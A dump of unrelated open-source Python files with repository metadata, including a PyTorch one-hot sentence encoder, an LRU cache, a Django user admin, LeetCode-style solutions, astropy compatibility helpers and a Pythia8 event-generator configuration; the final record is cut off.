[
"kwnafi@yahoo.com"
] |
kwnafi@yahoo.com
|
3a735af93117f64efe81849413af4f3138ba8356
|
9cb7670c64c13f09abee315f85f1f6b67b8eb1ad
|
/ptp/components/language/sentence_one_hot_encoder.py
|
3996236c4d9b703946b38c4f4760c5c9e33b0c2a
|
[
"Apache-2.0"
] |
permissive
|
ConnectionMaster/pytorchpipe
|
057325a5d4e8e6ce2198a953a705721388531add
|
9cb17271666061cb19fe24197ecd5e4c8d32c5da
|
refs/heads/develop
| 2023-04-07T17:46:26.451692
| 2019-11-05T23:36:13
| 2019-11-05T23:36:13
| 183,084,219
| 1
| 0
|
Apache-2.0
| 2023-04-03T23:18:43
| 2019-04-23T19:38:29
|
Python
|
UTF-8
|
Python
| false
| false
| 4,091
|
py
|
# Copyright (C) tkornuta, IBM Corporation 2019
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__author__ = "Tomasz Kornuta"
import torch
from ptp.components.component import Component
from ptp.components.mixins.word_mappings import WordMappings
from ptp.data_types.data_definition import DataDefinition
class SentenceOneHotEncoder(Component, WordMappings):
"""
Class responsible for encoding of samples being sequences of words using 1-hot encoding.
"""
def __init__(self, name, config):
"""
Initializes the component.
:param name: Component name (read from configuration file).
:type name: str
:param config: Dictionary of parameters (read from the configuration ``.yaml`` file).
:type config: :py:class:`ptp.configuration.ConfigInterface`
"""
# Call constructor(s) of parent class(es) - in the right order!
Component.__init__(self, name, SentenceOneHotEncoder, config)
WordMappings.__init__(self)
# Set key mappings.
self.key_inputs = self.stream_keys["inputs"]
self.key_outputs = self.stream_keys["outputs"]
def input_data_definitions(self):
"""
Function returns a dictionary with definitions of input data that are required by the component.
:return: dictionary containing input data definitions (each of type :py:class:`ptp.utils.DataDefinition`).
"""
return {
self.key_inputs: DataDefinition([-1, -1, 1], [list, list, str], "Batch of sentences, each represented as a list of words [BATCH_SIZE] x [SEQ_LENGTH] x [string]"),
}
def output_data_definitions(self):
"""
Function returns a dictionary with definitions of output data produced the component.
:return: dictionary containing output data definitions (each of type :py:class:`ptp.utils.DataDefinition`).
"""
return {
self.key_outputs: DataDefinition([-1, -1, len(self.word_to_ix)], [list, list, torch.Tensor], "Batch of sentences, each represented as a list of vectors [BATCH_SIZE] x [SEQ_LENGTH] x [VOCABULARY_SIZE]"),
}
def __call__(self, data_streams):
"""
Encodes "inputs" in the format of list of tokens (for a single sample)
Stores result in "encoded_inputs" field of in data_streams.
:param data_streams: :py:class:`ptp.utils.DataStreams` object containing (among others):
- "inputs": expected input field containing list of words [BATCH_SIZE] x [SEQ_SIZE] x [string]
- "encoded_targets": added output field containing list of indices [BATCH_SIZE] x [SEQ_SIZE] x [VOCABULARY_SIZE1]
"""
# Get inputs to be encoded.
inputs = data_streams[self.key_inputs]
outputs_list = []
# Process samples 1 by one.
for sample in inputs:
assert isinstance(sample, (list,)), 'This encoder requires input sample to contain a list of words'
# Process list.
output_sample = []
# Encode sample (list of words)
for token in sample:
# Create empty vector.
output_token = torch.zeros(len(self.word_to_ix)).type(self.app_state.FloatTensor)
# Add one for given word
output_token[self.word_to_ix[token]] += 1
# Add to outputs.
output_sample.append( output_token )
outputs_list.append(output_sample)
# Create the returned dict.
data_streams.publish({self.key_outputs: outputs_list})
|
[
"tkornut@us.ibm.com"
] |
tkornut@us.ibm.com
|
ff6ed44e73bac7a6b62db504dd1009a7c10746ca
|
2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02
|
/PyTorch/contrib/cv/video/I3D/mmaction/datasets/__init__.py
|
f04440bfbd5b1cb1aa81e8b37daed35a0a8f87cc
|
[
"GPL-1.0-or-later",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
Ascend/ModelZoo-PyTorch
|
4c89414b9e2582cef9926d4670108a090c839d2d
|
92acc188d3a0f634de58463b6676e70df83ef808
|
refs/heads/master
| 2023-07-19T12:40:00.512853
| 2023-07-17T02:48:18
| 2023-07-17T02:48:18
| 483,502,469
| 23
| 6
|
Apache-2.0
| 2022-10-15T09:29:12
| 2022-04-20T04:11:18
|
Python
|
UTF-8
|
Python
| false
| false
| 1,922
|
py
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
from .activitynet_dataset import ActivityNetDataset
from .audio_dataset import AudioDataset
from .audio_feature_dataset import AudioFeatureDataset
from .audio_visual_dataset import AudioVisualDataset
from .ava_dataset import AVADataset
from .base import BaseDataset
from .blending_utils import (BaseMiniBatchBlending, CutmixBlending,
MixupBlending)
from .builder import (BLENDINGS, DATASETS, PIPELINES, build_dataloader,
build_dataset)
from .dataset_wrappers import RepeatDataset
from .hvu_dataset import HVUDataset
from .image_dataset import ImageDataset
from .pose_dataset import PoseDataset
from .rawframe_dataset import RawframeDataset
from .rawvideo_dataset import RawVideoDataset
from .ssn_dataset import SSNDataset
from .video_dataset import VideoDataset
__all__ = [
'VideoDataset', 'build_dataloader', 'build_dataset', 'RepeatDataset',
'RawframeDataset', 'BaseDataset', 'ActivityNetDataset', 'SSNDataset',
'HVUDataset', 'AudioDataset', 'AudioFeatureDataset', 'ImageDataset',
'RawVideoDataset', 'AVADataset', 'AudioVisualDataset',
'BaseMiniBatchBlending', 'CutmixBlending', 'MixupBlending', 'DATASETS',
'PIPELINES', 'BLENDINGS', 'PoseDataset'
]
|
[
"wangjiangben@huawei.com"
] |
wangjiangben@huawei.com
|
d8751d6aed8551800d5fa2b4ca68e98c118d9357
|
284b8949a5e8a65d791bc8b6531fb4029100f798
|
/02281043.py
|
511423569a2e60d8b6f61d89283604c871259bad
|
[] |
no_license
|
Yanl05/Crawler
|
3ce19be3a041b9db0a2fa5e340f4e9aa37593e4c
|
af1c34b9e28b24740e090415a45c0ee808d058ab
|
refs/heads/master
| 2020-04-09T16:35:22.272829
| 2018-12-05T04:25:39
| 2018-12-05T04:25:39
| 160,457,052
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 146
|
py
|
class Car:
color = ''
def run(self):
print('go go go!!')
bmw = Car()
bmw.color = 'red'
print(bmw.color)
bmw.run()
print(bmw.run)
|
[
"756593069@qq.com"
] |
756593069@qq.com
|
eeeff347b088cf7928a142ac122aa3e6ebe54d89
|
6f5b8fa3693be70f258e1a74f4874d02fdb105a6
|
/asdl/__init__.py
|
5dde4913227376aa52bf3e5eb64c1cadab4fcc40
|
[
"Apache-2.0"
] |
permissive
|
ionutzzu12/external-knowledge-codegen
|
fb02823516e14f19d171928d88588623631d2963
|
3f96ee7c4a50cdd8649e564115dbe96bff059d87
|
refs/heads/master
| 2023-02-24T12:22:55.962963
| 2020-06-06T08:34:54
| 2020-06-06T08:34:54
| 262,047,517
| 0
| 0
|
Apache-2.0
| 2020-06-06T08:34:55
| 2020-05-07T12:43:54
|
Python
|
UTF-8
|
Python
| false
| false
| 334
|
py
|
import six
from .lang.lambda_dcs.lambda_dcs_transition_system import LambdaCalculusTransitionSystem
from .lang.prolog.prolog_transition_system import PrologTransitionSystem
if six.PY2:
from .lang.py.py_transition_system import PythonTransitionSystem
else:
from .lang.py3.py3_transition_system import Python3TransitionSystem
|
[
"frankxu2004@gmail.com"
] |
frankxu2004@gmail.com
|
583929ad0765fe89d9a7f1fc8b3f321c8cb5bdbe
|
6b78bd7f62f7f407bf11d877cc4d91e7db3b62fe
|
/csc/python/week-3-ds/src/day3/lru_cache/lru_cache.py
|
b8009b5e6480947a1769a37d0687614b451baee4
|
[] |
no_license
|
PascalUlor/code-challenges
|
b85efacd4bc5999a0748d1fa1e84f503be09dc94
|
6488d0a6d2729bd50b106573f16488479fd6e264
|
refs/heads/master
| 2023-03-03T17:50:18.413127
| 2023-02-21T13:10:02
| 2023-02-21T13:10:02
| 212,979,719
| 1
| 0
| null | 2023-02-15T22:59:13
| 2019-10-05T10:14:29
|
Python
|
UTF-8
|
Python
| false
| false
| 2,759
|
py
|
from doubly_linked_list import DoublyLinkedList
class LRUCache:
"""
Our LRUCache class keeps track of the max number of nodes it
can hold, the current number of nodes it is holding, a doubly-
linked list that holds the key-value entries in the correct
order, as well as a storage dict that provides fast access
to every node stored in the cache.
"""
def __init__(self, limit=10):
self.limit = limit
self.size = 0
self.order = DoublyLinkedList()
self.storage = dict()
"""
Retrieves the value associated with the given key. Also
needs to move the key-value pair to the end of the order
such that the pair is considered most-recently used.
Returns the value associated with the key or None if the
key-value pair doesn't exist in the cache.
"""
def get(self, key):
# if the key exists in the storage
if key in self.storage:
# set the node to the item at the key in storage
node = self.storage[key]
# move the node to end of order
self.order.move_to_end(node)
# return the nodes value
return node.value[1]
# otherwise
else:
# return None
return None
"""
Adds the given key-value pair to the cache. The newly-
added pair should be considered the most-recently used
entry in the cache. If the cache is already at max capacity
before this entry is added, then the oldest entry in the
cache needs to be removed to make room. Additionally, in the
case that the key already exists in the cache, we simply
want to overwrite the old value associated with the key with
the newly-specified value.
"""
def set(self, key, value):
# if key exists in storage
if key in self.storage:
# set the node to the storage at the key
node = self.storage[key]
# set the nodes value to the key value pair
node.value = (key, value)
# move the node to the end and
self.order.move_to_end(node)
# return to caller
return
# if the size is reaching the limit
if self.size == self.limit:
# delete the item at the head of the storage order
del self.storage[self.order.head.value[0]]
# remove node from head of the order
self.order.remove_from_head()
# decrement the size
self.size -= 1
# add the key value pair to the orders tail
self.order.add_to_tail((key, value))
# set the storage at key to the orders tail
self.storage[key] = self.order.tail
# increment size
self.size += 1
|
[
"pascalulor@yahoo.com"
] |
pascalulor@yahoo.com
|
5f9cd7cd2d9cea9cc9a1f16b39eca20fbfb64326
|
8cbe8ff380e170312a36a0213dfaddd71f0d8bf7
|
/accounts/admin.py
|
f619a6fecfd446404431f7a8e26f82aa010f4708
|
[] |
no_license
|
Gemy-star/bauhaus_new
|
60926aa9907b2b619a620d3ca0324ed7d99d08d1
|
270663f918c8965e9760ef547b89d3c8d7967120
|
refs/heads/main
| 2023-02-12T09:58:51.939396
| 2021-01-12T21:17:03
| 2021-01-12T21:17:03
| 321,507,414
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,099
|
py
|
from django import forms
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
from django.contrib.auth.forms import ReadOnlyPasswordHashField
from .models import User
class AddUserForm(forms.ModelForm):
"""
New User Form. Requires password confirmation.
"""
password1 = forms.CharField(
label='Password', widget=forms.PasswordInput
)
password2 = forms.CharField(
label='Confirm password', widget=forms.PasswordInput
)
class Meta:
model = User
fields = (
'email', 'first_name', 'last_name', 'phone', 'is_engineer', 'is_outdoor_engineer', 'is_admin',
'is_customer',
'is_superuser',
'profile_pic', 'is_active', 'is_staff', 'user_type')
def clean_password2(self):
# Check that the two password entries match
password1 = self.cleaned_data.get("password1")
password2 = self.cleaned_data.get("password2")
if password1 and password2 and password1 != password2:
raise forms.ValidationError("Passwords do not match")
return password2
def save(self, commit=True):
# Save the provided password in hashed format
user = super().save(commit=False)
user.set_password(self.cleaned_data["password1"])
if commit:
user.save()
return user
class UpdateUserForm(forms.ModelForm):
"""
Update User Form. Doesn't allow changing password in the Admin.
"""
password = ReadOnlyPasswordHashField()
class Meta:
model = User
fields = (
'email', 'first_name', 'last_name', 'phone', 'is_engineer', 'is_outdoor_engineer', 'is_admin',
'is_customer',
'is_superuser',
'profile_pic', 'is_active', 'is_staff', 'user_type')
def clean_password(self):
# Password can't be changed in the admin
return self.initial["password"]
class UserAdmin(BaseUserAdmin):
form = UpdateUserForm
add_form = AddUserForm
list_display = ('email', 'first_name', 'last_name', 'is_staff', 'timestamp')
list_filter = ('is_staff',)
fieldsets = (
(None, {'fields': ('email', 'password')}),
('Personal info', {'fields': ('first_name', 'last_name', 'phone', 'address', 'profile_pic')}),
('Permissions', {'fields': (
'is_active', 'is_engineer', 'is_admin', 'is_customer', 'is_outdoor_engineer', 'user_type', 'is_staff')}),
)
add_fieldsets = (
(
None,
{
'classes': ('wide',),
'fields': (
'email', 'first_name', 'last_name', 'password1', 'profile_pic', 'password2',
'user_type', 'phone', 'address',
'is_active', 'is_engineer', 'is_admin', 'is_outdoor_engineer', 'is_customer'
)
}
),
)
search_fields = ('email', 'first_name', 'last_name')
ordering = ('email', 'first_name', 'last_name')
filter_horizontal = ()
admin.site.register(User, UserAdmin)
|
[
"m.yassen.93@gmail.com"
] |
m.yassen.93@gmail.com
|
375ca61df7f3c090b6cae7b47334f507cdcba96b
|
cb4ab4584c4feda3bb1826aafadfea462ecdbf42
|
/AIs/AI_PlanC/__init__.py
|
d40f31db6ffa0b9f248c9431ab20f861a8eab6c4
|
[
"MIT"
] |
permissive
|
rimpo/coding-world-cup
|
15660a570ca400c82f0966f302b9b4a7a8968c77
|
964e3b58637f768f6dc5976bf729d993d63b46ab
|
refs/heads/master
| 2020-12-02T22:49:53.789544
| 2017-09-11T15:47:24
| 2017-09-11T15:47:24
| 30,821,540
| 0
| 0
| null | 2015-02-21T01:56:31
| 2015-02-15T07:56:10
|
C#
|
UTF-8
|
Python
| false
| false
| 231
|
py
|
from .coding_worldcup_api import CodingWorldCupAPI
from .js_object import JSObject
from .goh_ai import GohAI
from .position import Position
from .vector import Vector
from .classes import MarginFactors, DirectionType, GoalType
|
[
"richard.s.shepherd@gmail.com"
] |
richard.s.shepherd@gmail.com
|
db8283120c322835780a8040b991fc6cd6140f64
|
8fa3634da0f827c57480051fab280903501fa007
|
/setup.py
|
4553dd8663c4ff0091c6649a2c32f26918cf3d92
|
[
"Apache-2.0"
] |
permissive
|
ahnan4arch/seldom-pytest
|
519a30cbe31edc57ab804088acfa6a9f72c6b681
|
40e252c686118d137927592d6749313470ea0481
|
refs/heads/main
| 2023-07-24T04:49:26.858053
| 2021-09-07T15:28:45
| 2021-09-07T15:28:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,328
|
py
|
import re
import ast
import setuptools
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
_version_re = re.compile(r'__version__\s+=\s+(.*)')
with open('pytest_seldom/__init__.py', 'rb') as f:
version = str(ast.literal_eval(_version_re.search(
f.read().decode('utf-8')).group(1)))
setuptools.setup(
name="pytest-seldom",
version=version,
author="bugmaster",
author_email="fnngj@126.com",
description="A pytest wrapper with fixtures for Seldom to automate web browsers",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/seldomQA/seldom-pytest",
packages=["pytest_seldom"],
include_package_data=True,
install_requires=[
"pytest-html>=3.0.0",
"poium>=1.0.2",
"pytest",
"pytest-base-url",
],
entry_points={"pytest11": ["seldom = pytest_seldom.pytest_seldom"]},
classifiers=[
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
"Framework :: Pytest",
],
python_requires=">=3.7",
setup_requires=["setuptools_scm"],
)
|
[
"defnngj@gmail.com"
] |
defnngj@gmail.com
|
c1d05b21f21eda71db21e7fb3630c69eb6861bcd
|
460e920c18fe887cb2b07ca57fe2ad422ce7d0ce
|
/blog/admin.py
|
73067696a3e0be1372d1b776763f378177638aa8
|
[] |
no_license
|
acid-n/mydjangoBlog
|
893a4c1c7027c79fde3df5dd5c0feb82d8c252f6
|
e1f62b4f1504ecc13dfbd56a1c5be6b28951ba40
|
refs/heads/master
| 2020-09-12T19:14:44.187413
| 2019-11-18T19:07:17
| 2019-11-18T19:07:17
| 222,522,745
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 696
|
py
|
from django.contrib import admin
from .models import Post, Comment
# Register your models here.
@admin.register(Post)
class PostAdmin(admin.ModelAdmin):
list_display = ('title', 'slug', 'author', 'publish', 'status')
list_filter = ('status', 'created', 'publish', 'author')
search_fields = ('title', 'body')
prepopulated_fields = {'slug': ('title',)}
raw_id_fields = ('author',)
date_hierarchy = 'publish'
ordering = ('status', 'publish')
@admin.register(Comment)
class CommentAdmin(admin.ModelAdmin):
list_display = ('name', 'email', 'post', 'created', 'active')
list_filter = ('active', 'created', 'updated')
search_fields = ('name', 'email', 'body')
|
[
"acid_n@mail.ru"
] |
acid_n@mail.ru
|
fccad511ed6b1da264dece544d72513fcfa263c0
|
16bcda63a6bba61af0c835aabd73b0467696be4a
|
/SymmetricDifference/main.py
|
e1c9af5ac1b754656877c686ed64ee3aaaab231e
|
[] |
no_license
|
ZirvedaAytimur/HackerRank_Python
|
8ea7d629e75b4db31e04c64d102bf7a0a0b5632b
|
175017ed3d8ff11385e12e926b94da97797fc094
|
refs/heads/master
| 2023-03-13T13:00:42.225364
| 2021-03-10T20:36:18
| 2021-03-10T20:36:18
| 288,210,152
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 249
|
py
|
n = int(input())
a = set(map(int, input().split()))
m = int(input())
b = set(map(int, input().split()))
differenceAB = a.difference(b)
differenceBA = b.difference(a)
result = sorted(differenceAB.union(differenceBA))
for i in result:
print(i)
|
[
"zirvedaytimur@gmail.com"
] |
zirvedaytimur@gmail.com
|
eceba96f45693fbccf22d2a2e037432f1a9a458c
|
05caf48bd067c050666026b75686f23d02327378
|
/weekly-contest-141/shortest-path-in-binary-matrix.py
|
b7a5d64bbebde05852b1100a7d86ae4af78e79ec
|
[
"MIT"
] |
permissive
|
elfgzp/Leetcode
|
3b6fa307c699fd5a1ba5ea88988c324c33a83eb7
|
964c6574d310a9a6c486bf638487fd2f72b83b3f
|
refs/heads/master
| 2023-08-21T23:11:38.265884
| 2020-10-17T11:55:45
| 2020-10-17T11:55:45
| 168,635,331
| 3
| 0
|
MIT
| 2023-07-21T03:50:43
| 2019-02-01T03:14:49
|
Python
|
UTF-8
|
Python
| false
| false
| 898
|
py
|
from collections import deque
class Solution:
def shortestPathBinaryMatrix(self, grid: List[List[int]]) -> int:
n = len(grid)
if grid[0][0] == 1 or grid[-1][-1] == 1:
return -1
queue = deque([((0,0), 1)])
visited = {(0, 0)}
drs = [-1, 0, 1]
dcs = [-1, 0, 1]
while queue:
cur, step = queue.popleft()
r0, c0 = cur
if r0 == n - 1 and c0 == n - 1:
return step
for dr in drs:
for dc in dcs:
r, c = r0 + dr, c0 + dc
if 0 <= r < n and 0 <= c < n and grid[r][c] == 0 and (r, c) not in visited:
visited.add((r, c))
queue.append(((r, c), step + 1))
return -1
|
[
"741424975@qq.com"
] |
741424975@qq.com
|
af3d51a8c6651d6a849e9cf2e188cdf5e8176eaf
|
99e1a15d8f605be456f17608843c309dd8a3260f
|
/src/Pokemon/Abilities/resist_type_ability.py
|
7ae249538edcd5eca1ceabf4685a1ace3dbf6a34
|
[] |
no_license
|
sgtnourry/Pokemon-Project
|
e53604096dcba939efca358e4177374bffcf0b38
|
3931eee5fd04e18bb1738a0b27a4c6979dc4db01
|
refs/heads/master
| 2021-01-17T23:02:25.910738
| 2014-04-12T17:46:27
| 2014-04-12T17:46:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 631
|
py
|
from Pokemon.Abilities.ability import Ability
class ResistTypeAbility(Ability):
""" An Ability with modified effectivensses """
def __init__(self, name, types):
""" """
Ability.__init__(self, name)
self.types = types
def effectivenessOnDefense(self, attackType, target):
""" Returns the effectiveness of the attack when the Pokemon with this ability is defending """
if attackType in self.types:
return self.types[attackType]['effectiveness'], self.types[attackType]['message'].format(header=target.getHeader())
return 1, None
|
[
"cloew123@gmail.com"
] |
cloew123@gmail.com
|
bf5555989d86fa4f6bcf35bcbad1fc8472065722
|
1dacbf90eeb384455ab84a8cf63d16e2c9680a90
|
/pkgs/astropy-1.1.2-np110py27_0/lib/python2.7/site-packages/astropy/utils/compat/misc.py
|
9b56940a7d85a04a5497f9b2f99abf3c2480f150
|
[
"Apache-2.0",
"BSD-3-Clause",
"LicenseRef-scancode-unknown"
] |
permissive
|
wangyum/Anaconda
|
ac7229b21815dd92b0bd1c8b7ec4e85c013b8994
|
2c9002f16bb5c265e0d14f4a2314c86eeaa35cb6
|
refs/heads/master
| 2022-10-21T15:14:23.464126
| 2022-10-05T12:10:31
| 2022-10-05T12:10:31
| 76,526,728
| 11
| 10
|
Apache-2.0
| 2022-10-05T12:10:32
| 2016-12-15T05:26:12
|
Python
|
UTF-8
|
Python
| false
| false
| 3,556
|
py
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
Simple utility functions and bug fixes for compatibility with all supported
versions of Python. This module should generally not be used directly, as
everything in `__all__` will be imported into `astropy.utils.compat` and can
be accessed from there.
Includes the following fixes:
* The `contextlib.ignored` context manager, which is only available in Python
3.4 or greater.
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from ...extern import six
import functools
import sys
__all__ = ['invalidate_caches', 'override__dir__', 'ignored',
'possible_filename']
def possible_filename(filename):
"""
Determine if the ``filename`` argument is an allowable type for a filename.
In Python 3.3 use of non-unicode filenames on system calls such as
`os.stat` and others that accept a filename argument was deprecated (and
may be removed outright in the future).
Therefore this returns `True` in all cases except for `bytes` strings in
Windows on Python >= 3.3.
"""
if isinstance(filename, six.text_type):
return True
elif isinstance(filename, six.binary_type):
return not (sys.platform == 'win32' and
sys.version_info[:2] >= (3, 3))
return False
# Python 3.3's importlib caches filesystem reads for faster imports in the
# general case. But sometimes it's necessary to manually invalidate those
# caches so that the import system can pick up new generated files. See
# https://github.com/astropy/astropy/issues/820
if sys.version_info[:2] >= (3, 3):
from importlib import invalidate_caches
else:
invalidate_caches = lambda: None
def override__dir__(f):
"""
When overriding a __dir__ method on an object, you often want to
include the "standard" members on the object as well. This
decorator takes care of that automatically, and all the wrapped
function needs to do is return a list of the "special" members
that wouldn't be found by the normal Python means.
Example
-------
@override__dir__
def __dir__(self):
return ['special_method1', 'special_method2']
"""
if sys.version_info[:2] < (3, 3):
# There was no straightforward way to do this until Python 3.3, so
# we have this complex monstrosity
@functools.wraps(f)
def override__dir__wrapper(self):
members = set()
for cls in self.__class__.mro():
members.update(dir(cls))
members.update(six.iterkeys(self.__dict__))
members.update(f(self))
return sorted(members)
else:
# http://bugs.python.org/issue12166
@functools.wraps(f)
def override__dir__wrapper(self):
members = set(object.__dir__(self))
members.update(f(self))
return sorted(members)
return override__dir__wrapper
try:
from contextlib import ignored
except ImportError:
from contextlib import contextmanager
@contextmanager
def ignored(*exceptions):
"""A context manager for ignoring exceptions. Equivalent to::
try:
<body>
except exceptions:
pass
Example::
>>> import os
>>> with ignored(OSError):
... os.remove('file-that-does-not-exist')
"""
try:
yield
except exceptions:
pass
|
[
"wgyumg@mgail.com"
] |
wgyumg@mgail.com
|
147cf4364b9e0ec4c97c14d9487f7650af798832
|
0767d96d7d389d0c76b9915f33d19e910f5e3ae2
|
/changingthefoodchain/organizations/management/commands/loadorganizations.py
|
75cf04100d16dd9dbbdd0ba537a4b680f88c6ab4
|
[] |
no_license
|
ebrelsford/changingthefoodchain-back
|
3d7b68aadd97339910a98ea6da0f66ce2af46979
|
58d093ff4f4f211c1e83de099f4bf3981d598588
|
refs/heads/master
| 2021-01-22T09:05:20.114067
| 2016-01-15T02:33:10
| 2016-01-15T02:33:10
| 21,173,480
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,099
|
py
|
import csv
from django.contrib.gis.geos import Point
from django.core.management.base import BaseCommand
from organizations.models import Organization, Sector, Type
class Command(BaseCommand):
args = 'filename'
help = 'Load the organizations in the given CSV'
type_abbreviations = {
'a': 'advocacy group',
's': 'service organization',
'u': 'union',
'wc': 'workers center',
}
def get_sectors(self, raw):
sectors = [sector.strip() for sector in raw.lower().split('/')]
return [Sector.objects.get_or_create(name=s)[0] for s in sectors]
def get_type(self, name):
fullname = self.type_abbreviations[name.lower()]
type, created = Type.objects.get_or_create(name=fullname)
return type
def get_types(self, raw):
types = [t.strip() for t in raw.lower().split('/')]
return [self.get_type(t) for t in types]
def handle(self, filename, *args, **options):
for row in csv.DictReader(open(filename, 'r')):
try:
point = Point(float(row['longitude']), float(row['latitude']),
srid=4326)
except:
self.stdout.write(u'Failed to get point for %s' % row['Name'])
point = None
organization = Organization(
name=row['Name'],
address_line1=row['Address'],
city=row['City'],
state_province=row['State'],
postal_code=row['Zip'],
email=row['Email'],
phone=row['Phone #'],
site_url=row['website'] or None,
mission=row['Mission'] or None,
centroid=point,
)
try:
organization.save()
organization.sectors.add(*self.get_sectors(row['Food Sector(s)']))
organization.types.add(*self.get_types(row['Organization Type']))
except Exception:
print 'Failed to save organization %s' % organization.name
continue
|
[
"ebrelsford@gmail.com"
] |
ebrelsford@gmail.com
|
c1abfa1d38d1a7389e9f65eaf991440fc0579afd
|
f6fca4fe9923e82bdd69fbca661a4e7df16660cb
|
/kws_streaming/layers/sub_spectral_normalization.py
|
10b924a1b0189041f860da536ea4105cd6ad8052
|
[
"Apache-2.0",
"CC-BY-4.0"
] |
permissive
|
zdeagle/google-research
|
85664eae969cbeff3012bc5b0beb94c557030f9c
|
249751dfe7cb6e0b5be5c2e301d0aed71ab15ff2
|
refs/heads/master
| 2023-09-03T06:44:06.126169
| 2021-11-01T01:44:43
| 2021-11-01T02:11:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,133
|
py
|
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Sub spectral normalization layer."""
from kws_streaming.layers.compat import tf
class SubSpectralNormalization(tf.keras.layers.Layer):
"""Sub spectral normalization layer.
It is based on paper:
"SUBSPECTRAL NORMALIZATION FOR NEURAL AUDIO DATA PROCESSING"
https://arxiv.org/pdf/2103.13620.pdf
"""
def __init__(self, sub_groups, **kwargs):
super(SubSpectralNormalization, self).__init__(**kwargs)
self.sub_groups = sub_groups
def call(self, inputs):
# expected input: [N, Time, Frequency, Channels]
if inputs.shape.rank != 4:
raise ValueError('input_shape.rank:%d must be 4' % inputs.shape.rank)
input_shape = inputs.shape.as_list()
if input_shape[2] % self.sub_groups:
raise ValueError('input_shape[2]: %d must be divisible by '
'self.sub_groups %d ' %
(input_shape[2], self.sub_groups))
net = inputs
if self.sub_groups == 1:
net = tf.keras.layers.BatchNormalization()(net)
else:
target_shape = [
input_shape[1], input_shape[2] // self.sub_groups,
input_shape[3] * self.sub_groups
]
net = tf.keras.layers.Reshape(target_shape)(net)
net = tf.keras.layers.BatchNormalization()(net)
net = tf.keras.layers.Reshape(input_shape[1:])(net)
return net
def get_config(self):
config = {'sub_groups': self.sub_groups}
base_config = super(SubSpectralNormalization, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
|
[
"copybara-worker@google.com"
] |
copybara-worker@google.com
|
41f97e277f906e0452fb33ce4ea04de915867d9e
|
a8d55aa06c84ba592207d3e784cb449987dbf73d
|
/python/HI/dijet_analysis/pPb8TeV/Pythia8_Dijet120_pp_TuneCUETP8M1_8160GeV_cff.py
|
9d359c1099dc989d03f935217c82f54be254fca2
|
[] |
no_license
|
CmsHI/genproductions
|
1a38e6d00a286ca485cc01f89c476d888a947b7f
|
bda8af4537f692677eafe10148cd17a7d364ebf8
|
refs/heads/master
| 2023-03-07T10:33:28.844648
| 2023-02-03T12:54:52
| 2023-02-03T12:54:52
| 15,395,480
| 0
| 5
| null | 2020-03-21T21:33:13
| 2013-12-23T12:58:04
|
Python
|
UTF-8
|
Python
| false
| false
| 1,075
|
py
|
import FWCore.ParameterSet.Config as cms
from Configuration.Generator.Pythia8CommonSettings_cfi import *
from Configuration.Generator.Pythia8CUEP8M1Settings_cfi import *
generator = cms.EDFilter("Pythia8GeneratorFilter",
PythiaParameters = cms.PSet(
pythia8CommonSettingsBlock,
pythia8CUEP8M1SettingsBlock,
parameterSets = cms.vstring('pythia8CommonSettings',
'pythia8CUEP8M1Settings',
'processParameters'),
processParameters = cms.vstring('HardQCD:all = on',
'PhaseSpace:pTHatMin = 120.',
'PhaseSpace:pTHatMax = 9999.'),
),
comEnergy = cms.double(8160.0),
filterEfficiency = cms.untracked.double(1.0),
maxEventsToPrint = cms.untracked.int32(0),
pythiaHepMCVerbosity = cms.untracked.bool(False),
pythiaPylistVerbosity = cms.untracked.int32(0)
)
configurationMetadata = cms.untracked.PSet(
annotation = cms.untracked.string('PYTHIA 8 (unquenched) dijets in NN (pt-hat > 120 GeV) at sqrt(s) = 8.16 TeV')
)
ProductionFilterSequence = cms.Sequence(generator)
|
[
"marta.verweij@cern.ch"
] |
marta.verweij@cern.ch
|
913972683869049d67d35ad24c16ab8a76fb8aea
|
380372bbec9b77df14bb96fc32aca7061cca0635
|
/covid/calc/italy/sird_out.py
|
0839b65487e1954ded6ee16c860c90ae410488da
|
[] |
no_license
|
IchiroYoshida/python_public
|
